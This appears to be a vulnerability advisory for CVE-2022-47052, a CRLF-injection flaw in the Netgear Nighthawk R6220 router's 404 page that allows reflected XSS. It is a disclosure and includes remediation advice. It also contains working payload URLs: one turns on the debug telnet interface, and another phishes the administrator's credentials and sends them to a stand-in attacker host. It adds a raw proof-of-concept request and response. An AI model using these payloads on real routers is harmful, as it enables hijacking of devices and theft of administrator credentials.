Headline
CVE-2022-47052: NETGEAR/CVE-2022-47052 at main · dest-3/NETGEAR
The web interface of the ‘Nighthawk R6220 AC1200 Smart Wi-Fi Router’ is vulnerable to a CRLF Injection attack that can be leveraged to perform Reflected XSS and HTML Injection. A malicious unauthenticated attacker can exploit this vulnerability using a specially crafted URL. This affects firmware versions: V1.1.0.112_1.0.1, V1.1.0.114_1.0.1.
Response Splitting via CRLF****Description
CRLF (Carriage Return Line Feed) Injection CWE-93: https://cwe.mitre.org/data/definitions/93.html
Response splitting via Carriage Return Line Feed (CRLF) is a vulnerability that exploits the way HTTP headers parse certain characters such as \rand \n. Appending these characters to HTTP headers can allow the insertion of payloads into a header which can result in the manipulation of cookies, server information, and status codes.
Type: Unauthenticated Remote attack
Tested on firmware version: V1.1.0.112_1.0.1, V1.1.0.114_1.0.1
Details
The web interface of the ‘Nighthawk R6220 AC1200 Smart Wi-Fi Router’ is vulnerable to a CRLF Injection attack that can be leveraged to perform Reflected XSS and HTML Injection.
This issue affects the custom 404 page that is served when a request is issued for a page that does not exist. By leveraging this vulnerability, an unauthenticated remote attacker is able to inject arbitrary HTML and JavaScript code to be executed in a user’s browser.
Impact
A malicious attacker can exploit this vulnerability using a specially crafted URL. If this URL is opened by an administrator, the attacker can achieve the following:
Perform actions on the administrative portion of the web application Example payload that enables the debug telnet interface: https://192.168.1.1/666%0A%0A%3Cscript%3Edocument.location=%22https://192.168.1.1/setup.cgi?todo=debug%22;%3C/script%3E
Obtain the administrator’s credentials through phishing Example phishing payload: https://192.168.1.1/123%0A%0A%3Cscript>var name=prompt(“Username”);var pass=prompt(“Password”);document.location="http://attacker.server/?user="+name+"?pass="+pass;</script>
Note that if another vulnerability is presented in the administrative portal such as a Remote Command Execution (RCE), an attacker can use a specially crafted URL and chain the two vulnerabilities to create a one-click exploit.
Evidence
The request consists of a resource that does not exist (“xsstesty”) followed by Line-Feed characters (%0A%0A) and the JavaScript payload.
Request
GET /xsstesty%0A%0A%3Cscript%3Ealert('xss');%3C/script%3E
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: sessionid=sid17289xxx158005xxx1087458037
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Note that the HTTP response headers are embedded directly into the 404 page response body and the payload is executed on the victim’s browser.
Response Body
<script>alert('xss');</script> HTTP/1.1 404 Not Found
Server:
Date: Fri, 02 Jan 1970 02:44:27 GMT
Content-Type: text/html
P3P: 443
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1;mode=block
X-Content-Type-Options: nosniff
Connection: close
<HTML>
<HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H4>404 Not Found</H4>
File not found.
</BODY>
</HTML>
Remediation
Sanitize and neutralize all user-supplied data or properly encode output in HTTP headers that would otherwise be visible to users in order to prevent the injection of CRLF sequences and their consequences.